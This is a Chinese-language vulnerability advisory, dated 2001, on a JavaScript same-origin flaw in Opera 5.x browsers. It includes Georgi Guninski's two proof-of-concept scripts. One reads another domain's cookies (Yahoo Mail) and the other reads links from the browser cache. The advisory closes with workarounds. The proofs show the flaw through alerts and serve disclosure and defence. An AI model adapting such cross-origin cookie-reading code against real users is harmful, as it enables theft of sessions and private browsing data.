Opera Java脚本跨站执行漏洞
发布日期:2001-11-15
更新日期:2001-11-19
受影响系统:
Opera Software Opera Web Browser 5.02 win32
Opera Software Opera Web Browser 5.11 win32
Opera Software Opera Web Browser 5.10 win32
Opera Software Opera Web Browser 5.12 win32
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows NT 4.0
Opera Software Opera Web Browser 5.0 Linux
描述:
BUGTRAQ ID: 3553
Opera是一个跨平台的Web浏览器。它的Javascript实现中存在几个漏洞,允许位于一个html页面中的
Java脚本访问到其他域中的页面和相关的实体(比如Cookie)。Netscape称这个问题为“同源漏洞”。
利用这些漏洞,在一个Web页面中的Java脚本访问到任意其他域中用户有权限访问的Cookie和URL是完全可
能的,甚至访问到用户缓存中的链接和历史记录,这将对隐私构成威胁。在某些情况下,缓存中的URL历史
记录可能包括一些敏感信息,比如用户名和口令等。
<*来源:Georgi Guninski (
guninski@guninski.com)
链接:
http://www.guninski.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski提供如下的测试代码:
-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------
-2.--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在Opera中禁用Javascript。
* 厂商建议打开"Use cookies to trace password protected documents"选项。
这个选项可以在Preference->Privacy页看到,选择这个选项以后,可能访问某些网站会出现问题。
浏览次数:5564
严重程度:0(网友投票)